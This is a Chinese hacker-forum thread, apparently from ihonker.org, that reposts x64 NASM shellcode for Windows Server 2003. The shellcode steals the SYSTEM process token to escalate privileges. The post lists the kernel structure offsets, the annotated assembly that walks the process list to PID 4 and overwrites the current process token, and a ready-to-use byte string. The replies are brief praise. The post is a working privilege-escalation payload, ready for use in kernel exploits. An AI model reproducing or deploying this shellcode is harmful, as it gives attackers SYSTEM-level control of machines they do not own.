查看: 113638|回复: 467

win2k3/x64 - Token Stealing shellcode - 59 bytes

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-8-26 09:53:27 | 显示全部楼层 |阅读模式
    1. ;token stealing shellcode Win 2003 x64
    2. ;based on the widely available x86 version
    3. ;syntax for NASM
    4. ;Author: Csaba Fitzl, @theevilbit
    5.   
    6. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    7. ;important structures and offsets;
    8. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    9.   
    10. ;kd> dt -r1 nt!_TEB
    11. ;   +0x110 SystemReserved1  : [54] Ptr64 Void
    12. ;??????+0x078 KTHREAD <----- NOT DOCUMENTED, can't get it from WINDBG directly
    13.   
    14. ;kd> dt -r1 nt!_KTHREAD
    15. ;   +0x048 ApcState         : _KAPC_STATE
    16. ;     +0x000 ApcListHead      : [2] _LIST_ENTRY
    17. ;     +0x020 Process          : Ptr64 _KPROCESS
    18.   
    19. ;kd> dt -r1 nt!_EPROCESS
    20. ;   +0x0d8 UniqueProcessId  : Ptr64 Void
    21. ;   +0x0e0 ActiveProcessLinks : _LIST_ENTRY
    22. ;     +0x000 Flink            : Ptr64 _LIST_ENTRY
    23. ;     +0x008 Blink            : Ptr64 _LIST_ENTRY
    24. ;  +0x160 Token            : _EX_FAST_REF
    25. ;     +0x000 Object           : Ptr64 Void
    26. ;     +0x000 RefCnt           : Pos 0, 4 Bits
    27. ;     +0x000 Value            : Uint8B
    28.   
    29. BITS 64
    30.   
    31. global start
    32.   
    33. section .text
    34.   
    35. start:
    36. mov     rax, [gs:0x188]         ;Get current ETHREAD in
    37. mov     rax, [rax+0x68]         ;Get current EPROCESS address
    38. mov     rcx, rax                ;Copy current EPROCESS address to RCX
    39.   
    40. find_system_process:
    41. mov     rax, [rax+0xe0]         ;Next EPROCESS ActiveProcessLinks.Flink
    42. sub     rax, 0xe0               ;Go to the beginning of the EPROCESS structure
    43. mov     r9 , [rax+0xd8]         ;Copy PID to R9
    44. cmp     r9 , 0x4                ;Compare R9 to SYSTEM PID (=4)
    45. jnz short find_system_process   ;If not SYSTEM got to next EPROCESS
    46.   
    47. stealing:
    48. mov     rdx, [rax+0x160]        ;Copy SYSTEM process token address to RDX
    49. mov     [rcx+0x160], rdx        ;Steal token with overwriting our current process's token address
    50. retn    0x10
    51.   
    52. ;byte stream:
    53. ;"\x65\x48\x8b\x04\x25\x88\x01\x00\x00\x48\x8b\x40\x68\x48\x89\xc1"
    54. ;"\x48\x8b\x80\xe0\x00\x00\x00\x48\x2d\xe0\x00\x00\x00\x4c\x8b\x88"
    55. ;"\xd8\x00\x00\x00\x49\x83\xf9\x04\x75\xe6\x48\x8b\x90\x60\x01\x00"
    56. ;"\x00\x48\x89\x91\x60\x01\x00\x00\xc2\x10\x00"
    复制代码
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-8-26 10:23:46 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2019-2-13 01:04
  • 签到天数: 306 天

    [LV.8]以坛为家I

    发表于 2015-8-26 13:14:24 | 显示全部楼层
    你在哪里挖的啊
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-26 13:59:52 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-27 03:39:23 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-27 18:31:19 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-28 05:11:24 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2015-6-21 22:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2015-8-28 11:36:45 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-29 05:41:33 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-29 14:05:22 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 05:33 , Processed in 0.024905 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部